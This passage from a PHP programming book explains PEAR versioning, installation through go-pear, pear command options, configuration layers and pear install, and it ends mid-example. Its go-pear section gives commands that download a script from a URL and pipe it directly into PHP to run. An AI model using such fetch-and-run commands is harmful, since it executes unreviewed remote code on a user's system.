    1.0         1.0.0       B         This one is subtle; adding a level makes a version newer.

Major Versus Minor Version Versus Patch Level

So, what does it mean when the newest release of a package has a different major version than the one you have installed? Well, this is the theory: It should always be safe to upgrade to a newer patch level within the same major.minor version. If you use 1.0.1, upgrading to 1.0.2 is safe. There will only be bug fixes and very minor feature changes between patch levels. The API is completely backward compatible.

It may or may not be safe to upgrade to a newer minor version within the same major version. A minor version increase signifies anything from small to big feature additions, and may introduce API changes. You should always read the release notes and change log for the releases between the one you have and the one you are upgrading to, to become aware of potential problems.

If the major version of a package changes, it no longer attempts to be backward compatible. The package may have been re-implemented around a different paradigm or simply removed obsolete features.

Major Version Changes

When the major version of a package changes, the package name is changed and, as a result, the class names inside the package change, too. This is to support having multiple major versions of the same package installed in the same file layout.
For example, when version 2.0 of the Money_Fast package is released, the package name for that major version changes to either Money_Fast2, Money_Fast_v2, or Money_Fastv2.

10.3 Obtaining PEAR

In this section, you learn how to install PEAR on your platform from a PHP distribution or through the go-pear.org web site.

10.3.1 Installing with UNIX / Linux PHP Distribution

This section describes PEAR installation and basic usage that is specific to UNIX or UNIX-like platforms, such as Linux and Darwin. The installation of the PEAR Installer itself is somewhat OS-dependent, and because most of what you need to know about installation is OS-specific, you find that here. Using the installer is more similar on different platforms, so that is described in the next section, with the occasional note about OS idiosyncrasies.

As of PHP 4.3.0, PEAR with all its basic prerequisites is installed by default when you install PHP. If you build PHP from source, these configure options cause problems for PEAR:

☞ --disable-pear. make install will install neither the PEAR Installer nor any packages.
☞ --disable-cli. The PEAR Installer depends on a standalone version of PHP being installed.
☞ --without-xml. PEAR requires the XML extension for parsing package information files.

10.3.1.1 Windows

This section shows how to install PEAR on a Windows PHP installation. Start by just installing a binary distribution of PHP from http://www.php.net/downloads.php (see Figure 10.1). If you go with the defaults, your PHP install will end up in C:\PHP, which is what you will see in the forthcoming examples.

Fig. 10.1 PHP Welcome screen.

10.3.2 Installing with PHP Windows Installer

When you have PHP installed, you need to make sure that your include_path PHP setting is sensible. Some versions of the Windows PHP Installer use c:\php4\pear in the default include path, but this directory (c:\php4) is different from the one created by the PHP Windows Installer. So, edit your php.ini file (in c:\winnt or c:\windows, depending on your Windows version) and change this directory to c:\php\pear (see Figure 10.2).

Fig. 10.2 Example php.ini modifications.

Now, you are ready to use go-pear.

10.3.3 go-pear.org

go-pear.org is a web site with a single PHP script that you can download and run to install the latest stable version of the PEAR Installer and the PEAR Foundation Classes (PFC). go-pear is cross-platform and can be run from the command line and from your web server.

PHP distributions bundle a particular release of the PEAR Installer; go-pear, on the other hand, gives you the newest stable PEAR releases. However, go-pear does not know your directory layout, so it really contorts itself to figure it out, and then tries to adapt your PEAR installation to that.

In this section, you learn how to use go-pear from the command line and web server, and on UNIX and Windows.

10.3.3.1 Prerequisites

Because go-pear is written in PHP, you need a CGI or CLI version of PHP to execute it outside the web server. By default, the CLI version is installed along with your web server PHP module. Try running php -v to see if it is available to you:

    PHP 5.0.0 (cli), Copyright (c) 1997-2004 The PHP Group
    Zend Engine v2.0, Copyright (c) 1998-2004 Zend Technologies

By default, the php command is installed in the /usr/local/bin directory on UNIX, or c:\php on Windows. In Windows, the CLI version of PHP may also be called php-cli; in that case, you need to type php-cli for every example that says just php.

10.3.3.2 Going PEAR

If your PHP install did not include PEAR, you can use go-pear as a universal PEAR bootstrapper. All you need is a CLI or CGI version of PHP installed somewhere. You can download the go-pear script and execute it, or run it all in one command, like this:

    $ lynx -source http://go-pear.org | php

This command simply takes the contents of http://go-pear.org and sends it to PHP for execution. If you do not have lynx available on your system, try an alternative way of executing go-pear directly:

Using GNU wget:

    $ wget -O- http://go-pear.org | php

Using fetch on FreeBSD:

    $ fetch -o - http://go-pear.org | php

Using Perl LWP's GET utility:

    $ GET http://go-pear.org | php

On Windows, there is no “fetch this URL” tool, but you may be able to use PHP's URL streams (make sure that URL includes are not disabled in your php.ini file; in PHP 5.0, the allow_url_fopen setting controls this):

    C:\> php-cli -r "include('http://go-pear.org');"

If none of this works, open http://go-pear.org in your browser, save the contents as go-pear.php, and simply run it from there:

    C:\> php go-pear.php

The output will look like this:

    Welcome to go-pear!

    Go-pear will install the 'pear' command and all the files needed by
    it. This command is your tool for PEAR installation and maintenance.

    Go-pear also lets you download and install the PEAR packages bundled
    with PHP: DB, Net_Socket, Net_SMTP, Mail, XML_Parser, PHPUnit.

    If you wish to abort, press Control-C now, or press Enter to continue:

This greeting tells you what you are about to start. Press Enter for the first real question:

    HTTP proxy (http://user:password@proxy.myhost.com:port), or Enter for none:

go-pear checks your http_proxy environment variable and presents the value of that as the default value if http_proxy is defined. If you want to use an HTTP proxy when downloading packages, enter the address of it here, or just press Enter for “no proxy.”

Now, on to the interesting part:

    Below is a suggested file layout for your new PEAR installation. To
    change individual locations, type the number in front of the
    directory. Type 'all' to change all of them, or simply press Enter to
    accept these locations.

    1. Installation prefix          : /usr/local
    2. Binaries directory           : $prefix/bin
    3. PHP code directory           : $prefix/share/pear
    4. Documentation base directory : $php_dir/docs
    5. Data base directory          : $php_dir/data
    6. Tests base directory         : $php_dir/tests

    1-6, 'all' or Enter to continue:

Each setting is internally assigned to a variable (prefix, bin_dir, php_dir, doc_dir, data_dir, and test_dir, respectively). You may refer to the value of other settings by referencing these variables, as shown previously. Let's take a look at each setting:

☞ Installation prefix. The root directory of your PEAR installation. It has no other effect than serving as a root for the next five settings, using $prefix.
☞ Binaries directory. Where programs and PHP scripts from PEAR packages are installed. The pear executable ends up here. Remember to add this directory to your PATH.
☞ PHP code directory. Where PHP code is installed. This directory must be in your include_path when using the packages you install.
☞ Documentation base directory. The base directory for documentation. By default, it is $php_dir/docs, and the documentation files for each package are installed as $doc_dir/Package/file.
☞ Data base directory. Where the PEAR Installer stores data files. Data files are just a catch-all category for anything that does not fit as PHP code, documentation, and so on. As with the documentation base directory, the package name is added to the path, so the data file convert.xsl in MyPackage would be installed as $data_dir/MyPackage/convert.xsl.
☞ Tests base directory. Where regression test scripts for the package are installed. The package name is also added to the directory.

When you are satisfied with the directory layout, press Enter to proceed:

    The following PEAR packages are bundled with PHP: DB, Net_Socket, Net_SMTP,
    Mail, XML_Parser, PHPUnit2.
    Would you like to install these as well? [Y/n] :

For your convenience, go-pear asks whether you want to install the PFC packages. Just install them (press Enter):

    Loading zlib: ok
    Downloading package: PEAR...ok
    Downloading package: Archive_Tar...ok
    Downloading package: Console_Getopt...ok
    Downloading package: XML_RPC...ok
    Bootstrapping: PEAR...(remote) ok
    Bootstrapping: Archive_Tar...(remote) ok
    Bootstrapping: Console_Getopt...(remote) ok
    Downloading package: DB...ok
    Downloading package: Net_Socket...ok
    Downloading package: Net_SMTP...ok
    Downloading package: Mail...ok
    Downloading package: XML_Parser...ok
    Downloading package: PHPUnit2...ok
    Extracting installer...ok
    install ok: PEAR 1.3.1
    install ok: Archive_Tar 1.2
    install ok: Console_Getopt 1.2
    install ok: XML_RPC 1.1.0
    install ok: DB 1.6.4
    install ok: Net_Socket 1.0.2
    install ok: Net_SMTP 1.2.6
    install ok: Mail 1.1.3
    install ok: XML_Parser 1.2.0
    install ok: PHPUnit2 2.0.0beta2

    The 'pear' command is now at your service at /usr/local/bin/pear

Congratulations, you have just installed PEAR!

10.4 Installing Packages

This section covers how to maintain your collection of installed packages. The following examples all assume that you have the PEAR Installer installed and configured.

The PEAR Installer comes with different user interfaces, called front-ends. The default front-end that is installed by go-pear along with PHP is the command-line (CLI) front-end. You will see a presentation of two graphical front-ends too, one that is browser-based and one that is Gtk-based.

10.4.1 Using the pear Command

The pear command is the main installation tool for PEAR. It has several subcommands, such as install and upgrade, and runs on all platforms PEAR supports: UNIX, Windows, and Darwin.

The first subcommand you should be familiar with is help. pear help subcommand displays a short help text and lists all the command-line options for that subcommand. pear help displays a list of subcommands. This is what the output looks like:

    $ pear help
    Usage: pear [options] command [command-options] <parameters>
    Type "pear help options" to list all options.
    Type "pear help <command>" to get the help for the specified command.
    Commands:
    build                  Build an Extension From C Source
    bundle                 Unpacks a PECL package
    clear-cache            Clear XML-RPC Cache
    config-get             Show One Setting
    config-help            Show Information About Setting
    config-set             Change Setting
    config-show            Show All Settings
    cvsdiff                Run a "cvs diff" for all files in a package
    cvstag                 Set CVS Release Tag
    download               Download Package
    download-all           Downloads every package from {config master_server}
    info                   Display information about a package
    install                Install Package
    list                   List Installed Packages
    list-all               List All Packages
    list-upgrades          List Available Upgrades
    login                  Connects and authenticates to remote server
    logout                 Logs out from the remote server
    makerpm                Builds an RPM package from a PEAR package
    package                Build Package
    package-dependencies   Show package dependencies
    package-validate       Validate Package Consistency
    remote-info            Information About Remote Packages
    remote-list            List Remote Packages
    run-tests              Run Regression Tests
    search                 Search remote package database
    shell-test             Shell Script Test
    sign                   Sign a package distribution file
    uninstall              Un-install Package
    upgrade                Upgrade Package
    upgrade-all            Upgrade All Packages

10.4.1.1 Options

Command-line options (such as -n or --nodeps) may be specified to both the pear command itself and to the subcommand. The syntax is like this:

    pear [options] sub-command [sub-command options] [sub-command arguments]

To list the options for the pear command itself ([options] as shown earlier), type pear help options:

    $ pear help options
    Options:
         -v         increase verbosity level (default 1)
         -q         be quiet, decrease verbosity level
         -c file    find user configuration in 'file'
         -C file    find system configuration in 'file'
         -d foo=bar set user config variable 'foo' to 'bar'
         -D foo=bar set system config variable 'foo' to 'bar'
         -G         start in graphical (Gtk) mode
         -s         store user configuration
         -S         store system configuration
         -u foo     unset 'foo' in the user configuration
         -h, -?     display help/usage (this message)
         -V         version information

All these options are optional and may always be specified regardless of what subcommand is used. Let's go through them one by one.

Option: -v
“V” is for “verbose.” This option increases the installer's verbosity level for this command. The verbosity level is stored in the verbose configuration parameter, so unless you specify the -s option, the verbosity is increased only for this execution. The PEAR Installer has four verbosity levels:

☞ 0. Really silent.
☞ 1. Informational messages.
☞ 2. Trace messages.
☞ 3. Debug output.

Here's an example:

    $ pear -v install Auth
    + tmp dir created at /tmp/tmpAR6ABu
    downloading Auth-1.1.1.tgz ...
    ...done: 11,005 bytes
    + tmp dir created at /tmp/tmp4BPB6x
    installed: /usr/share/pear/Auth/Auth.php
    installed: /usr/share/pear/Auth/Container.php
    + create dir /usr/share/pear/docs/Auth
    installed: /usr/share/pear/docs/Auth/README.Auth
    + create dir /usr/share/pear/Auth/Container
    installed: /usr/share/pear/Auth/Container/DB.php
    installed: /usr/share/pear/Auth/Container/File.php
    installed: /usr/share/pear/Auth/Container/LDAP.php
    install ok: Auth 1.1.1

This option may be repeated to increase the verbosity even more.

Option: -q
“Q” is for “quiet.” This option is just like the -v option except that it reduces the verbosity level.

Option: -c / -C
“C” is for “configuration file.” This option is used to specify the configuration file to use for the user configuration layer. Configuration layers are described in the “Configuration Parameters” section. The -C option does the same thing for the system configuration layer.

This option can be useful, for example, if you want to maintain a test area for PEAR packages by having separate directories for php_dir & company, and simply switching configurations by using the -c option.

Here's an example:

    $ pear -c ~/.pearrc.test list

If combined with the -s or -S options, the configuration will be saved to the file specified with the -c or -C option.

Option: -d / -D
“D” is for “define.” The -d option sets a configuration parameter for this command. This is a volatile configuration change; the change only applies to the current command. The -D variation does the same thing, except it changes the system configuration layer (more on layers in the next section).

Here's an example:

    $ pear -d http_proxy=proxy.example.com:3128 remote-list

Again, combined with the -s option, the configuration parameter changed with the -d option is stored and becomes permanent, as will the -S option for configuration parameters changed with the -D option.

Option: -G
“G” is for “Gtk” or “graphical,” if you prefer. This option starts the PEAR Installer with the Gtk front-end. You need to have the php-gtk and PEAR_Frontend_Gtk packages installed. You can try that out later in this chapter.

Option: -s / -S
“S” is for “store configuration,” and causes the pear command to store any volatile configuration changes you made with the -d option. The uppercase and lowercase versions of this option have the same function but for different configuration layers. You learn about configuration layers in the next section; until then, keep in mind that the -s option is for the user layer, and the -S option is for the system layer. All configuration changes are stored, including the verbosity level if you changed that with the -v or -q option.

Option: -u
“U” is for “unset.” This option is for removing the definition of a configuration parameter from the user configuration layer.
The purpose of this is to revert that parameter to the system-specified value easily. You do not have to worry about what the old value was, unless the system layer has changed in the meantime; it will still be there, and will be used when the user configuration is unset. By default, the effect of this option lasts only for one execution; combine it with the -s option to make it permanent.

Option: -h
“H” is for “help.” It does the same thing as pear help or just pear.

Option: -V
“V” is for “version.” This option makes the pear command just display version information and exit.
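The interplay between the user and system layers, and the effect of unsetting a user value with -u, can be sketched in a few lines. This is an illustrative model only, not the PEAR Installer's own code; the function name config_get() and the sample values are assumptions.

```php
<?php
// Illustrative model of two configuration layers (not PEAR's real code).
$system = array('http_proxy' => 'proxy.example.com:3128', 'verbose' => 1);
$user   = array('verbose' => 2);

// Hypothetical lookup: the user layer wins, then the system layer.
function config_get($key, array $user, array $system)
{
    if (array_key_exists($key, $user)) {
        return $user[$key];
    }
    return array_key_exists($key, $system) ? $system[$key] : null;
}

echo config_get('verbose', $user, $system), "\n";     // user-layer value
echo config_get('http_proxy', $user, $system), "\n";  // falls back to system

// Comparable to "pear -u verbose": drop the user-layer definition,
// so the system-layer value shows through again.
unset($user['verbose']);
echo config_get('verbose', $user, $system), "\n";
```

In this model, unsetting never touches the system array, which mirrors the point made above: the system-specified value is still there and takes over as soon as the user definition is gone.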

10.5 Configuration Parameters

The different installer front-ends differ only in their user-interface specific parts; the core, executing part of each command, is shared between all front-ends. Their configuration parameters are also common; the documentation base directory used in the command-line installation is the same one used by the Gtk installer, and so on.

The PEAR Installer has many configuration parameters, only some of which you need to worry about right now. Look at the PEAR main directory parameter and the other directory parameters first.

Next is the complete list of configuration parameters in the PEAR Installer (see Table 10.4). This is close to what you see when running the pear config-show command.

Table 10.4 PEAR Configuration Parameters

    Configuration Parameter              Variable Name     Example Value
    PEAR main directory                  php_dir           /usr/share/pear
    PEAR executables directory           bin_dir           /usr/bin
    PEAR documentation directory         doc_dir           /usr/share/pear/docs
    PHP extension directory              ext_dir           /usr/lib/php/20010901
    PEAR Installer cache directory       cache_dir         /tmp/pear/cache
    PEAR data directory                  data_dir          /usr/share/pear/data
    PEAR test directory                  test_dir          /usr/share/pear/tests
    Cache TimeToLive                     cache_ttl         not set
    Preferred Package State              preferred_state   alpha
    UNIX file mask                       umask             022
    Debug Log Level                      verbose           1
    HTTP Proxy Server Address            http_proxy        not set
    PEAR server                          master_server     pear.php.net
    PEAR password (for maintainers)      password          not set
    PEAR user name (for maintainers)     username          not set
    Package Signature Type               sig_type          gpg
    Signature Handling Program           sig_bin           /usr/bin/gpg
    Signature Key Directory              sig_keydir        /usr/etc/pearkeys
    Signature Key Id                     sig_keyid         not set

The various directory parameters are base directories for installation of different file types, such as PHP code, dynamically loadable extensions, documentation, scripts, programs, and regression tests.
Some of these were men- tioned in the previous go-pear section, but here is the full list:

☞ PEAR main directory (php_dir). Directory where the PHP include files are stored, as well as PEAR's internal administration files to keep track of installed packages. If you change this configuration parameter, the installer will no longer "find" the packages you installed there. This feature makes it possible to maintain several PEAR installations on the same machine. The default value for this parameter is /usr/local/lib/php.

☞ PEAR executables directory (bin_dir). Directory where executable scripts and programs are installed. For example, the pear command itself is installed here. The default value for this parameter is /usr/local/bin.

☞ PEAR documentation directory (doc_dir). Directory where documentation files are installed. Directly beneath the doc_dir is a directory named after the package, containing all the documentation files installed with the package. The default value of this parameter is /usr/local/lib/php/docs.

☞ PHP extension directory (ext_dir). Directory where all PHP extensions that are built during install end up. Make sure you set extension_dir to this directory in your php.ini file. The default value for this parameter is /usr/local/lib/php/extensions/BUILDSPEC, where BUILDSPEC is composed of Zend's module API version and whether PHP was built with ZTS (Zend thread safety) and debugging. For example, BUILDSPEC would be 20020429 for the API released April 29, 2002, without ZTS and debug.

☞ PEAR installer cache directory (cache_dir). Directory where the installer may store caching data. This local caching is used to speed up repeated XML-RPC calls to the central server.

☞ PEAR data directory (data_dir). Directory that stores files that are neither code, regression tests, executables, nor documentation. Typical candidates for "data files" are DTD files, XSL stylesheets, offline template files, and so on.

☞ Cache TimeToLive (cache_ttl). The number of seconds cached XML-RPC calls should be stored before they are invalidated. Set this to a value larger than 0 to enable caching of XML-RPC method calls; this speeds up remote operations.

☞ Preferred Package State (preferred_state). Parameter that enables you to set the quality you expect from a package release before you even see it. There are five states to choose from: stable (production code), beta, alpha, snapshot, and devel. The installer perceives the quality of a release as highest with "stable" and lowest with "devel," and shows you releases of the preferred state or better. This means that if you set your preferred state to "stable," you only see stable releases when browsing the package database. However, if you set preferred state to "alpha," you see alpha as well as beta and stable-state releases.

☞ Unix file mask (umask). Parameter used to determine the default file permissions for new files on UNIX-style systems. The umask tells which file permission bits will be masked away.

☞ Debug Log Level (verbose). The default debug log level that says how many -v command-line options are used by default. The recommended value is 1, which is informational. A value of 2 shows some details about what the installer is doing. A value of 3 or greater is for debugging the installer.

☞ HTTP Proxy Server (http_proxy). You can set this configuration parameter to make the PEAR Installer always use a web proxy. You specify the proxy as host:port or http://host:port. If your proxy requires authorization, specify it as http://user:pw@host:port.

☞ PEAR Server (master_server). The hostname of the package registry server. Registry queries and downloads are all proxied through this server.

☞ PEAR username / PEAR password (username / password). For commands that require authorization, you must log in first with the login command. When you log in, your username and password are stored in these two configuration parameters (maintainers only).

☞ Signature Type (sig_type). What type of signature tool to use when signing packages (maintainers only).

☞ Signature Handling Program (sig_bin). The path of the executable used to handle signatures (maintainers only).

☞ Signature Key Directory (sig_keydir). The directory where PHP/PEAR-specific public and private keys are stored (maintainers only).

☞ Signature Key Id (sig_keyid). The key id that is used when signing packages. If this configuration parameter is not set, the default is left to the Signature Handling Program (maintainers only).
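To make the "preferred state or better" rule for preferred_state concrete, here is a minimal shell sketch of the comparison. It is only an illustration, not the installer's own code: the function names state_rank and state_visible are made up for this example, and the ranking simply follows the order in which the five states are listed above.

```shell
#!/bin/sh
# Rank the five release states named in the text; a higher number means
# higher perceived quality. The numbers themselves are an assumption made
# for this sketch; only their order matters.
state_rank() {
    case "$1" in
        devel)    echo 0 ;;
        snapshot) echo 1 ;;
        alpha)    echo 2 ;;
        beta)     echo 3 ;;
        stable)   echo 4 ;;
        *)        echo "unknown state: $1" >&2; return 1 ;;
    esac
}

# Succeeds when a release in state $2 is shown for preferred_state $1,
# that is, when the release state is the preferred state or better.
state_visible() {
    preferred=$(state_rank "$1") || return 2
    release=$(state_rank "$2") || return 2
    [ "$release" -ge "$preferred" ]
}

# Which release states are shown when preferred_state is alpha?
for state in devel snapshot alpha beta stable; do
    if state_visible alpha "$state"; then
        echo "$state: shown"
    else
        echo "$state: hidden"
    fi
done
```

With the preferred state set to alpha, the loop reports devel and snapshot as hidden, and alpha, beta, and stable as shown.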
Configuration Layers

Each configuration parameter may be defined in three locations, called layers: a user's private configuration file (the user layer), the system-wide configuration file (the system layer), and built-in defaults (the default layer). When you run the installer and it needs to look up some configuration parameter, it will check the user layer first. If the parameter is not user-defined, it checks the system layer. If it was not found in the system configuration either, the default layer is used. The default layer has a built-in default value for every configuration parameter.
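The lookup order just described (user, then system, then default) can be sketched in a few lines of shell. This is a simplified model under stated assumptions, not the installer's implementation: the layers are held in shell variables as key=value lines rather than in PEAR's real configuration files, the values are illustrative, and layer_contents and lookup are hypothetical helper names.

```shell
#!/bin/sh
# Hypothetical layer contents as key=value lines (not PEAR's real file format).
user_layer='preferred_state=beta'
system_layer=''
default_layer='php_dir=/usr/local/lib/php
preferred_state=stable'

# Print the contents of the named layer.
layer_contents() {
    case "$1" in
        user)    printf '%s\n' "$user_layer" ;;
        system)  printf '%s\n' "$system_layer" ;;
        default) printf '%s\n' "$default_layer" ;;
    esac
}

# Print "layer.name=value" for the first layer that defines parameter $1,
# checking the layers in precedence order. Fails if no layer defines it.
lookup() {
    for layer in user system default; do
        value=$(layer_contents "$layer" | sed -n "s/^$1=//p" | head -n 1)
        if [ -n "$value" ]; then
            echo "$layer.$1=$value"
            return 0
        fi
    done
    return 1
}

lookup php_dir          # defined only in the default layer
lookup preferred_state  # the user layer takes precedence over the default
```

The first call finds php_dir only in the default layer, while the second stops at the user layer and never consults the other two.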

To see the value of a single configuration parameter, use the pear config-get command. Here is the built-in help text and some usage examples:

    $ pear help config-get
    pear config-get <parameter> [layer]
    Displays the value of one configuration parameter. The first
    argument is the name of the parameter, an optional second argument
    may be used to tell which configuration layer to look in. Valid
    configuration layers are "user", "system" and "default". If no
    layer is specified, a value will be picked from the first layer
    that defines the parameter, in the order just specified.

(When reading the first line of the pear help output, it's useful to know that <foo> means that foo is a required argument, while [bar] means bar is optional.)

So, with config-get you may specify the layer. If you don't, it will pick the value from the highest-precedence layer that defines it. Now, for some examples:

    $ pear config-get verbose
    verbose=1
    $ pear config-get verbose user
    user.verbose=1
    $ pear config-get verbose system
    system.verbose=
    $ pear config-get verbose default
    default.verbose=1

As you can see, the verbose configuration parameter is set both in the user and default layer. That means it is the user-specified parameter that takes effect. It is possible to clear a user- or system-specified value with the -u option to the installer:

    $ pear -u verbose -s
    $ pear config-get verbose
    verbose=1
    $ pear config-get verbose user
    user.verbose=
    $ pear config-get verbose system
    system.verbose=
    $ pear config-get verbose default
    default.verbose=1

Changing the Configuration

To change a configuration parameter, you can use either pear config-set or pear -d. Here's the help text for config-set:

    $ pear help config-set
    pear config-set <parameter> <value> [layer]
    Sets the value of one configuration parameter. The first argument
    is the name of the parameter, the second argument is the new value.
    Some parameters are subject to validation, and the command will
    fail with an error message if the new value does not make sense.
    An optional third argument may be used to specify which layer to
    set the configuration parameter in. The default layer is "user".

Actually, this command

    $ pear config-set foo bar

is equivalent to

    $ pear -d foo=bar -s

The difference between pear -d and pear config-set is that the effect of config-set applies permanently from the next command, while -d applies only to the current command.

Tip: If you want to have parallel PEAR installations (for instance, one in which to test-install your own packages), define a shell alias to something like pear -c test-pear.conf, and set the different directory parameters in this configuration only.

Before you change everything, you should be aware that the PEAR main directory configuration parameter (php_dir) has a special function. The database of installed packages lives there in a subdirectory called .registry. If you change php_dir, you will not see the packages installed in the old php_dir anymore. Here's an example:

    $ pear config-get php_dir
    php_dir=/usr/local/lib/php
    $ pear list
    Installed packages:
    ===============
    Package          Version   State
    Archive_Tar      0.9       stable
    Console_Getopt   1.0       stable
    DB               1.3       stable
    Mail             1.0.1     stable
    Net_SMTP         1.0       stable
    Net_Socket       1.0.1     stable
    PEAR             1.0b2     stable
    XML_Parser       1.0       stable
    XML_RPC          1.0.4     stable

So, PEAR PHP files are installed in /usr/local/lib/php, and you have just the core packages provided by the go-pear install. Now, try changing php_dir:

    $ pear config-set php_dir /usr/share/pear
    $ pear list
    (no packages installed)

There's no reason to panic: your packages are still in /usr/local/lib/php, but the installer doesn't see them now. How do you get the old php_dir setting back? In addition to the pear config-set command, the pear command has some options where you can set individual configuration parameters only for one run, permanently, or unset a parameter in a specific layer.

You may return to the old setting by setting it explicitly like this:

    $ pear config-set php_dir /usr/local/lib/php

But to demonstrate the flexibility of configuration layers, you can simply unset php_dir from the user configuration layer instead:

    $ pear -u php_dir -s
    $ pear list
    Installed packages:
    ===============
    Package          Version   State
    Archive_Tar      0.9       stable
    Console_Getopt   1.0       stable
    DB               1.3       stable
    Mail             1.0.1     stable
    Net_SMTP         1.0       stable
    Net_Socket       1.0.1     stable
    PEAR             1.0b2     stable
    XML_Parser       1.0       stable
    XML_RPC          1.0.4     stable

Your packages are back! The -u php_dir option makes pear delete php_dir from the (u)ser layer for this run, while the -s option makes configuration changes to the user layer permanent. Effectively, this reverts php_dir to the value it has in the "system" layer or, if it is not set there, to the built-in default.

If you would just like to set a configuration value for a single run of the pear command, here is how:

    $ pear -d preferred_state=alpha remote-list

This sets the preferred_state configuration parameter to alpha (in the user layer, if you care to know) for this command. What this command does is show you packages and releases of stable, beta, and alpha quality from pear.php.net. By default, you will only see stable releases.

There are three places where each configuration parameter may be defined. First, the installer looks at the user's local configuration (~/.pearrc on UNIX, pear.ini in the System directory on Windows). If the requested parameter was found in the user configuration, that value is returned. If not, the installer proceeds to the system-wide configuration file (/etc/pear.conf on UNIX, pearsys.ini in the System directory on Windows). If that fails as well, a default built-in value is used.
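Before changing anything, it can help to know which of these layer files actually exist on your machine. The following sketch checks the two UNIX locations named above; layer_file is a hypothetical helper written for this example, and the script only tests for the files' presence without reading them.

```shell
#!/bin/sh
# Map a layer name to the UNIX configuration file named in the text.
# The default layer is built in, so it has no file.
layer_file() {
    case "$1" in
        user)   echo "$HOME/.pearrc" ;;
        system) echo "/etc/pear.conf" ;;
        *)      return 1 ;;
    esac
}

# Report whether each file-backed layer is present.
for layer in user system; do
    file=$(layer_file "$layer")
    if [ -f "$file" ]; then
        echo "$layer layer: $file"
    else
        echo "$layer layer: $file (not present)"
    fi
done
```

A layer whose file is not present simply defines nothing, so lookups fall through to the next layer.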

For the two example settings in Table 10.5, php_dir and preferred_state, PEAR looks for a value starting on the first row (the user layer) going down until a value exists. In this example, the php_dir setting resolves to /usr/local/lib/php, which is the default. The preferred_state setting resolves to beta because this is the value set in the user layer.

Table 10.5

    Config Layer   php_dir setting      preferred_state setting
    User           (not set)            beta
    System         (not set)            (not set)
    Default        /usr/local/lib/php   stable

The content of the configuration files is serialized PHP data, which is not for the faint of heart to read or edit. If you edit it directly and make a mistake, you lose the entire layer upon saving it again, so stick to the pear command.

10.6 PEAR COMMANDS

In this section, you learn all the PEAR Installer commands for installation and maintenance of packages on your system. For each of the commands, you will have the output of pear help for that command, and a thorough explanation of every option the command offers. If you notice commands mentioned in some of the help text that you do not find covered here, those commands are used by PEAR package maintainers during development. The development commands are covered in Chapter 12.

10.6.1 pear install

This command takes the content of a package file and installs files in your designated PEAR directories. You may specify the package to install as a local file, just the package name, or as a full HTTP URL. Here's the help text for pear install:

    $ pear help install
    pear install [options] <package> ...
    Installs one or more PEAR packages. You can specify a package to
    install in four ways:

    "Package-1.0.tgz" : installs from a local file

    "http://example.com/Package-1.0.tgz" : installs from
    anywhere on the net.

    "package.xml" : installs the package described in
    package.xml. Useful for testing, or for wrapping a PEAR package
    in another package manager such as RPM.

    "Package" : queries your configured server
    (pear.php.net) and downloads the newest package with
    the preferred quality/state (stable).

    More than one package may be specified at once. It is ok to mix
    these four ways of specifying packages.

    Options:

    -f, --force
        will overwrite newer installed packages

The --force option lets you install the package even if the same release or a newer release is already installed. This is useful for repairing broken installs, or during testing.

    -n, --nodeps
        ignore dependencies, install anyway

Use this option to ignore dependencies and pretend that they are already installed. Use it only if you understand the consequences; the installed package may not work at all.

    -r, --register-only
        do not install files, only register the package as installed

The --register-only option makes the installer list your package as installed, but it does not actually install any files. The purpose of this is to make it possible for non-PEAR package managers to also register packages as installed in the PEAR package registry. For example, if you install DB (the PEAR database layer) with an RPM, all the files are installed and you can use it, but the pear list command does not show that it is installed because RPM does not (by default) update the PEAR package registry. But, if the RPM package has a post-install command that runs pear install --register-only package.xml, the package will be registered, both from RPM's and PEAR's point of view.

    -s, --soft
        soft install, fail silently, or upgrade if already installed

This option is another way of saying, "Please give me the latest version of this package." If the package is not installed already, it will be installed. If the package is installed but you are specifying a package tarball with a newer package, or the latest online version is newer, the package will be upgraded.
The difference between pear install -s and pear upgrade is that upgrade upgrades only if the package is already installed.

    -B, --nobuild
        don't build C extensions

If you are installing a package that is a mix of PHP and C code and don't want to build and install the C code, or you simply want to test-install a package with C code, use --nobuild.

    -Z, --nocompress
        request uncompressed files when downloading

If your PHP build does not include the zlib extension, PHP cannot uncompress gzipped package files. The installer detects this automatically, and will download non-gzipped packages when necessary. But, if this detection doesn't work, you can override it with the --nocompress option.

    -R DIR, --installroot=DIR
        root directory used when installing files (ala PHP's INSTALL_ROOT)

This option is useful when you are installing PEAR packages from a script or using another package manager. All file names created by the installer will have DIR prepended.

    --ignore-errors
        force install even if there were errors

If there are errors in a package and the installer refuses to go ahead and install it, you can use the --ignore-errors option to force installation. There is a risk of an inconsistent install when using this option, so use it with care!

    -a, --alldeps
        install all required and optional dependencies

Use this option to automatically download and install any dependencies.

    -o, --onlyreqdeps
        install all required dependencies

Some packages have optional dependencies, which means a dependency that exists to use optional features of the package. If you want to satisfy all the required dependencies, but don't need the optional features, use this option.

Here are some examples of typical use. First, a plain example installing a package with no dependencies:

    $ pear install Console_Table
    downloading Console_Table-1.0.1.tgz ...
    Starting to download Console_Table-1.0.1.tgz (3,319 bytes)
    ...done: 3,319 bytes
    install ok: Console_Table 1.0.1

Here is an example of installing a package with many optional dependencies, but pulling only the packages that are required:

    $ pear install -o HTML_Progress
    downloading HTML_Progress-1.1.tgz ...
    Starting to download HTML_Progress-1.1.tgz (163,298 bytes)
    ...done: 163,298 bytes
    skipping Package 'html_progress' optional dependency 'HTML_CSS'
    skipping Package 'html_progress' optional dependency 'HTML_Page'
    skipping Package 'html_progress' optional dependency 'HTML_QuickForm'
    skipping Package 'html_progress' optional dependency 'HTML_QuickForm_Controller'
    skipping Package 'html_progress' optional dependency 'Config'
    downloading HTML_Common-1.2.1.tgz ...
    Starting to download HTML_Common-1.2.1.tgz (3,637 bytes)
    ...done: 3,637 bytes
    install ok: HTML_Common 1.2.1
    Optional dependencies:
    package 'HTML_CSS' version >= 0.3.1 is recommended to utilize some features.
    package 'HTML_Page' version >= 2.0.0RC2 is recommended to utilize some features.
    package 'HTML_QuickForm' version >= 3.1.1 is recommended to utilize some features.
    package 'HTML_QuickForm_Controller' version >= 0.9.3 is recommended to utilize some features.
    package 'Config' version >= 1.9 is recommended to utilize some features.
    install ok: HTML_Progress 1.1

Finally, this example installs a package and all dependencies, looking for releases of beta or better quality:

    $ pear -d preferred_state=beta install -a Services_Weather
    downloading Services_Weather-1.2.2.tgz ...
    Starting to download Services_Weather-1.2.2.tgz (29,205 bytes)
    ...done: 29,205 bytes
    downloading Cache-1.5.4.tgz ...
    Starting to download Cache-1.5.4.tgz (30,690 bytes)
    ...done: 30,690 bytes
    downloading HTTP_Request-1.2.1.tgz ...
